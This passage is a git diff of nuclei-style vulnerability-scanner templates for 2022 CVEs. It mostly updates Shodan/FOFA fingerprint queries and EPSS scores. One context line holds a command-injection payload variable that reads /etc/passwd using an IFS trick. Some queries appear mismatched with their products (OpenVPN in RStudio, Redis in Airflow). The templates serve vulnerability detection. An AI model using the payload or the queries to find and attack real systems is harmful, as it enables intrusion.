+29,9 @@ info: max-request: 1 vendor: hospital_management_system_project product: hospital_management_system - shodan-query: http.html:"Hospital Management System" + shodan-query: + - http.html:"Hospital Management System" + - http.html:"hospital management system" fofa-query: body="hospital management system" tags: cve,cve2022,hms,cms,sqli,hospital_management_system_project diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index e287a58f1b..31416a3cbd 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: schneider-electric product: spacelogic_c-bus_home_controller_firmware - shodan-query: html:"SpaceLogic C-Bus" + shodan-query: + - html:"SpaceLogic C-Bus" + - http.html:"spacelogic c-bus" fofa-query: body="spacelogic c-bus" tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index d6fd9106bc..90bdd1423a 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -15,13 +15,14 @@ info: - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828 - https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81 - https://nvd.nist.gov/vuln/detail/CVE-2022-3506 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-3506 cwe-id: CWE-79 - epss-score: 0.00135 - epss-percentile: 0.48543 + epss-score: 0.00144 + epss-percentile: 0.50194 cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 8bfa02f8eb..86a9dd4b38 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -21,16 +21,20 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35151 cwe-id: CWE-79 - epss-score: 0.02148 - epss-percentile: 0.8906 + epss-score: 0.0157 + epss-percentile: 0.87243 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: body="kkfileview" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - body="kkfileview" + - app="kkfileview" tags: cve,cve2022,xss,kkfileview,keking http: diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index d0402ebb9e..8353348233 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_access_manager_plus - shodan-query: http.title:"ManageEngine" + shodan-query: + - http.title:"ManageEngine" + - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev,zohocorp diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index 31149b221d..d67db09e2a 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: pentasecurity product: wapples - shodan-query: http.title:"Intelligent WAPPLES" + shodan-query: + - http.title:"Intelligent WAPPLES" + - http.title:"intelligent wapples" fofa-query: title="intelligent wapples" google-query: intitle:"intelligent wapples" tags: cve,cve2022,wapples,firewall,default-login,pentasecurity diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index aac718e87b..8507f7781e 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: wrteam product: eshop_-_ecommerce_\/_store_website - shodan-query: http.html:"eShop - Multipurpose Ecommerce" + shodan-query: + - http.html:"eShop - Multipurpose Ecommerce" + - http.html:"eshop - multipurpose ecommerce" fofa-query: body="eshop - multipurpose ecommerce" tags: cve,cve2022,eshop,xss,wrteam diff --git a/http/cves/2022/CVE-2022-35653.yaml b/http/cves/2022/CVE-2022-35653.yaml index aff68e65ae..91487d1f27 100644 --- a/http/cves/2022/CVE-2022-35653.yaml +++ b/http/cves/2022/CVE-2022-35653.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: moodle product: moodle - shodan-query: title:"Moodle" + shodan-query: + - title:"Moodle" + - cpe:"cpe:2.3:a:moodle:moodle" + - http.title:"moodle" fofa-query: title="moodle" google-query: intitle:"moodle" tags: cve,cve2022,moodle,xss diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index ec0a19e4d3..28c6a8b832 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: glpi-project product: glpi - shodan-query: http.favicon.hash:"-1474875778" - fofa-query: icon_hash="-1474875778" + shodan-query: + - http.favicon.hash:"-1474875778" + - http.title:"glpi" + fofa-query: + - icon_hash="-1474875778" + - title="glpi" google-query: intitle:"glpi" tags: cve,cve2022,glpi,rce,kev,glpi-project variables: diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index dd5e534d12..1475404be1 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: webmin product: webmin - shodan-query: title:"Webmin" + shodan-query: + - title:"Webmin" + - http.title:"webmin" fofa-query: title="webmin" google-query: intitle:"webmin" tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 2157353306..7e32442cca 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: zkoss product: zk_framework - shodan-query: http.title:"Server backup manager" + shodan-query: + - http.title:"Server backup manager" + - http.title:"server backup manager" fofa-query: title="server backup manager" google-query: intitle:"server backup manager" tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml index fd4bce5deb..979411a124 100644 --- a/http/cves/2022/CVE-2022-36553.yaml +++ b/http/cves/2022/CVE-2022-36553.yaml @@ -26,7 +26,9 @@ info: vendor: hytec product: hwl-2511-ss_firmware fofa-query: title="index" && header="lighttpd/1.4.30" - zoomeye-query: app:"Hytec Inter HWL-2511-SS" + zoomeye-query: + - app:"Hytec Inter HWL-2511-SS" + - app:"hytec inter hwl-2511-ss" tags: cve2022,cve,hytec,rce http: diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index 447decc05c..80ad7e5aa0 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: telosalliance product: omnia_mpx_node_firmware - shodan-query: http.title:"Omnia MPX Node | Login" + shodan-query: + - http.title:"Omnia MPX Node | Login" + - http.title:"omnia mpx node | login" fofa-query: title="omnia mpx node | login" google-query: intitle:"omnia mpx node | login" tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml index 4548af5cd1..ed48514652 100644 --- a/http/cves/2022/CVE-2022-36883.yaml +++ b/http/cves/2022/CVE-2022-36883.yaml @@ -29,7 +29,9 @@ info: vendor: jenkins product: git framework: jenkins - shodan-query: X-Jenkins + shodan-query: + - X-Jenkins + - x-jenkins tags: cve,cve2022,jenkins,plugin,git,intrusive http: diff --git a/http/cves/2022/CVE-2022-37042.yaml b/http/cves/2022/CVE-2022-37042.yaml index e66a2899cb..1260afb4fc 100644 --- a/http/cves/2022/CVE-2022-37042.yaml +++ b/http/cves/2022/CVE-2022-37042.yaml @@ -19,15 +19,20 @@ info: cvss-score: 9.8 cve-id: CVE-2022-37042 cwe-id: CWE-22 - epss-score: 0.97539 - epss-percentile: 0.99994 + epss-score: 0.97554 + epss-percentile: 0.99997 cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: max-request: 4 vendor: zimbra product: collaboration - shodan-query: http.favicon.hash:"1624375939" - fofa-query: app="zimbra-邮件系统" + shodan-query: + - http.favicon.hash:"1624375939" + - http.favicon.hash:"475145467" + fofa-query: + - app="zimbra-邮件系统" + - icon_hash="475145467" + - icon_hash="1624375939" tags: cve,cve2022,zimbra,rce,unauth,kev http: diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index 8ffb2f30a9..8141a91e82 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: articatech product: artica_proxy - shodan-query: http.html:"Artica" + shodan-query: + - http.html:"Artica" + - http.html:"artica" fofa-query: body="artica" tags: cve,cve2022,xss,artica,articatech diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml index 6cd220e036..c9e2ba2d84 100644 --- a/http/cves/2022/CVE-2022-37191.yaml +++ b/http/cves/2022/CVE-2022-37191.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-37191 cwe-id: CWE-829 - epss-score: 0.46328 - epss-percentile: 0.97122 + epss-score: 0.39013 + epss-percentile: 0.97239 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 0e1e14bfce..d1261f7f9a 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -14,13 +14,14 @@ info: - https://github.com/IBAX-io/go-ibax/issues/2061 - https://vuldb.com/?id.212636 - https://nvd.nist.gov/vuln/detail/CVE-2022-3800 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-3800 - cwe-id: CWE-89,CWE-707 - epss-score: 0.05291 - epss-percentile: 0.92303 + cwe-id: CWE-707,CWE-89 + epss-score: 0.03544 + epss-percentile: 0.91587 cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-38131.yaml b/http/cves/2022/CVE-2022-38131.yaml index 655d78afdb..f7fc26f4e9 100644 --- a/http/cves/2022/CVE-2022-38131.yaml +++ b/http/cves/2022/CVE-2022-38131.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: rstudio product: connect - shodan-query: "http.favicon.hash:217119619" - fofa-query: "app=\"RStudio-Connect\"" + shodan-query: + - "http.favicon.hash:217119619" + - http.title:"openvpn connect" + fofa-query: + - "app=\"RStudio-Connect\"" + - title="openvpn connect" google-query: intitle:"openvpn connect" tags: tenable,cve,cve2022,redirect,rstudio diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index 95f0612c1b..43bab2b595 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38295 cwe-id: CWE-79 - epss-score: 0.00269 - epss-percentile: 0.64416 + epss-score: 0.0024 + epss-percentile: 0.61973 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml index 8a18e4b952..6dff519aee 100644 --- a/http/cves/2022/CVE-2022-38296.yaml +++ b/http/cves/2022/CVE-2022-38296.yaml @@ -13,13 +13,14 @@ info: reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-38296 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-38296 cwe-id: CWE-434 - epss-score: 0.02351 - epss-percentile: 0.88674 + epss-score: 0.03924 + epss-percentile: 0.9198 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index e04c5c458d..24c851082c 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -22,15 +22,20 @@ info: cve-id: CVE-2022-38463 cwe-id: CWE-79 epss-score: 0.00174 - epss-percentile: 0.53646 + epss-percentile: 0.54507 cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: servicenow product: servicenow - shodan-query: http.title:"ServiceNow" - fofa-query: title="servicenow" + shodan-query: + - http.title:"ServiceNow" + - http.title:"servicenow" + - http.favicon.hash:1701804003 + fofa-query: + - title="servicenow" + - icon_hash=1701804003 google-query: intitle:"servicenow" tags: cve,cve2022,servicenow,xss diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index fa85aa016a..9558401adf 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-38467 cwe-id: CWE-79 epss-score: 0.00092 - epss-percentile: 0.37951 + epss-percentile: 0.3922 cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index 2568e62f01..f49c0a2055 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -29,9 +29,11 @@ info: max-request: 1 vendor: creativeitem product: academy_learning_management_system - google-query: intext:"Study any topic, anytime" shodan-query: http.html:"study any topic, anytime" fofa-query: body="study any topic, anytime" + google-query: + - intext:"Study any topic, anytime" + - intext:"study any topic, anytime" tags: cve2022,cve,academylms,xss,creativeitem http: diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index 751c6e1847..325eb6ea97 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -21,15 +21,17 @@ info: cvss-score: 9.8 cve-id: CVE-2022-38637 cwe-id: CWE-89 - epss-score: 0.01231 - epss-percentile: 0.85126 + epss-score: 0.04195 + epss-percentile: 0.92211 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: hospital_management_system_project product: hospital_management_system - shodan-query: http.html:"Hospital Management System" + shodan-query: + - http.html:"Hospital Management System" + - http.html:"hospital management system" fofa-query: body="hospital management system" tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index beec3bb0bf..7537ee8854 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -28,7 +28,9 @@ info: max-request: 3 vendor: linuxfoundation product: dapr_dashboard - shodan-query: http.title:"Dapr Dashboard" + shodan-query: + - http.title:"Dapr Dashboard" + - http.title:"dapr dashboard" fofa-query: title="dapr dashboard" google-query: intitle:"dapr dashboard" tags: cve,cve2022,dapr,dashboard,unauth,linuxfoundation diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 706f6a28c1..c33866d0b0 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: free5gc product: free5gc - shodan-query: http.title:"free5GC Web Console" + shodan-query: + - http.title:"free5GC Web Console" + - http.title:"free5gc web console" fofa-query: title="free5gc web console" google-query: intitle:"free5gc web console" tags: cve,cve2022,free5gc,exposure diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml index 77603026e6..81824e1f91 100644 --- a/http/cves/2022/CVE-2022-39048.yaml +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -24,8 +24,13 @@ info: max-request: 3 vendor: servicenow product: servicenow - shodan-query: http.title:"ServiceNow" - fofa-query: title="servicenow" + shodan-query: + - http.title:"ServiceNow" + - http.title:"servicenow" + - http.favicon.hash:1701804003 + fofa-query: + - title="servicenow" + - icon_hash=1701804003 google-query: intitle:"servicenow" tags: cve,cve2022,xss,servicenow,authenticated diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index f2443e7cdc..4367d97008 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: lsoft product: listserv - shodan-query: http.html:"LISTSERV" + shodan-query: + - http.html:"LISTSERV" + - http.html:"listserv" fofa-query: body="listserv" tags: cve,cve2022,xss,listserv,packetstorm,lsoft diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 995836d282..6059daa30a 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: sophos product: mobile - shodan-query: http.favicon.hash:-1274798165 - fofa-query: title="Sophos Mobile" + shodan-query: + - http.favicon.hash:-1274798165 + - http.title:"sophos mobile" + fofa-query: + - title="Sophos Mobile" + - icon_hash=-1274798165 + - title="sophos mobile" google-query: intitle:"sophos mobile" tags: cve,cve2022,xxe,ssrf,sophos diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index a720a454db..ff8097dac3 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: fortinet product: fortinac - shodan-query: title:"FortiNAC" + shodan-query: + - title:"FortiNAC" + - http.title:"fortinac" fofa-query: title="fortinac" google-query: intitle:"fortinac" tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 2d8c4e0e5b..3b67b7be9e 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -30,7 +30,9 @@ info: vendor: netic product: group_export framework: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2022,atlassian,jira,netic,unauth http: diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index 04a2881288..bcc7adcddc 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -23,8 +23,12 @@ info: max-request: 2 vendor: flatpress product: flatpress - shodan-query: http.html:"flatpress" - fofa-query: body="flatpress" + shodan-query: + - http.html:"flatpress" + - http.favicon.hash:-1189292869 + fofa-query: + - body="flatpress" + - icon_hash=-1189292869 tags: cve,cve2022,flatpress,authenticated,xss,intrusive variables: randstring: "{{to_lower(rand_base(16))}}" diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 945d8d35a3..9314a2628e 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -29,9 +29,18 @@ info: max-request: 3 vendor: apache product: airflow - shodan-query: title:"Sign In - Airflow" - fofa-query: title="sign in - airflow" - google-query: intitle:"sign in - airflow" + shodan-query: + - title:"Sign In - Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - title="sign in - airflow" + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + google-query: + - intitle:"sign in - airflow" + - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve,cve2022,airflow,rce,oast,authenticated,apache http: diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index b478fb995a..39a6c084e7 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4049 cwe-id: CWE-89 - epss-score: 0.04217 - epss-percentile: 0.92045 + epss-score: 0.04713 + epss-percentile: 0.92631 cpe: cpe:2.3:a:wp_user_project:wp_user:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -25,9 +25,9 @@ info: vendor: wp_user_project product: wp_user framework: wordpress - publicwww-query: /wp-content/plugins/wp-user/ shodan-query: http.html:/wp-content/plugins/wp-user/ fofa-query: body=/wp-content/plugins/wp-user/ + publicwww-query: /wp-content/plugins/wp-user/ tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project http: diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 2b2b7709de..6d66b86386 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -28,9 +28,9 @@ info: vendor: optimizingmatters product: autooptimize framework: wordpress - publicwww-query: /wp-content/plugins/autoptimize shodan-query: http.html:/wp-content/plugins/autoptimize fofa-query: body=/wp-content/plugins/autoptimize + publicwww-query: /wp-content/plugins/autoptimize tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters http: diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index 816d2ce143..bac75cfd07 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -25,9 +25,9 @@ info: vendor: blocksera product: cryptocurrency_widgets_pack framework: wordpress - publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/ shodan-query: http.html:/wp-content/plugins/cryptocurrency-widgets-pack/ fofa-query: body=/wp-content/plugins/cryptocurrency-widgets-pack/ + publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/ tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera http: diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index 304af08190..75ac502f3e 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: unisharp product: laravel_filemanager - shodan-query: http.html:"Laravel Filemanager" + shodan-query: + - http.html:"Laravel Filemanager" + - http.html:"laravel filemanager" fofa-query: body="laravel filemanager" tags: cve,cve2022,laravel,unisharp,lfi,traversal diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index d9cb8ada39..89c55b804d 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: body="kkfileview" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - body="kkfileview" + - app="kkfileview" tags: cve,cve2022,kkFileView,xss,keking http: diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index 38c81c3963..73ee07473c 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: contec product: solarview_compact - shodan-query: http.favicon.hash:"-244067125" + shodan-query: + - http.favicon.hash:"-244067125" + - cpe:"cpe:2.3:h:contec:solarview_compact" tags: cve,cve2022,solarview,rce,lfi,contec variables: cmd: "cat${IFS}/etc/passwd" diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml index 09867aabce..a218815aa2 100644 --- a/http/cves/2022/CVE-2022-41412.yaml +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: perfsonar product: perfsonar - fofa-query: title="perfSONAR Toolkit" + fofa-query: + - title="perfSONAR Toolkit" + - title="perfsonar toolkit" tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar http: diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index ecbc89d286..06718fb276 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: reqlogic product: reqlogic - shodan-query: http.html:"ReQlogic" + shodan-query: + - http.html:"ReQlogic" + - http.html:"reqlogic" fofa-query: body="reqlogic" tags: cve,cve2022,packetstorm,xss,reqlogic diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index d3fd5a34f8..0425c0cd93 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: rpcms product: rpcms - shodan-query: http.html:"RPCMS" + shodan-query: + - http.html:"RPCMS" + - http.html:"rpcms" fofa-query: body="rpcms" tags: cve,cve2022,rpcms,xss diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 14ab26f454..70d56a827f 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.8 cve-id: CVE-2022-42094 cwe-id: CWE-79 - epss-score: 0.0071 - epss-percentile: 0.80039 + epss-score: 0.00858 + epss-percentile: 0.82247 cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index 70d7002717..611aa9d9ae 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -19,16 +19,21 @@ info: cvss-score: 9.8 cve-id: CVE-2022-42233 cwe-id: CWE-287 - epss-score: 0.87277 - epss-percentile: 0.9839 + epss-score: 0.67005 + epss-percentile: 0.9794 cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: tenda product: 11n_firmware - shodan-query: http.title:"Tenda 11N" - fofa-query: product=="Tenda-11N-Wireless-AP" + shodan-query: + - http.title:"Tenda 11N" + - http.title:"tenda 11n" + fofa-query: + - product=="Tenda-11N-Wireless-AP" + - product=="tenda-11n-wireless-ap" + - title="tenda 11n" google-query: intitle:"tenda 11n" tags: cve,cve2022,tenda,auth-bypass,router,iot diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index c5e80e79f7..371ac72b8c 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -21,15 +21,17 @@ info: cvss-score: 6.1 cve-id: CVE-2022-42746 cwe-id: CWE-79 - epss-score: 0.00109 - epss-percentile: 0.42811 + epss-score: 0.00111 + epss-percentile: 0.44292 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: auieo product: candidats - shodan-query: http.html:"CandidATS" + shodan-query: + - http.html:"CandidATS" + - http.html:"candidats" fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index d6d35eb203..989c9c9c6e 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: auieo product: candidats - shodan-query: http.html:"CandidATS" + shodan-query: + - http.html:"CandidATS" + - http.html:"candidats" fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index d3e44e6d09..837b641fbe 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: auieo product: candidats - shodan-query: http.html:"CandidATS" + shodan-query: + - http.html:"CandidATS" + - http.html:"candidats" fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 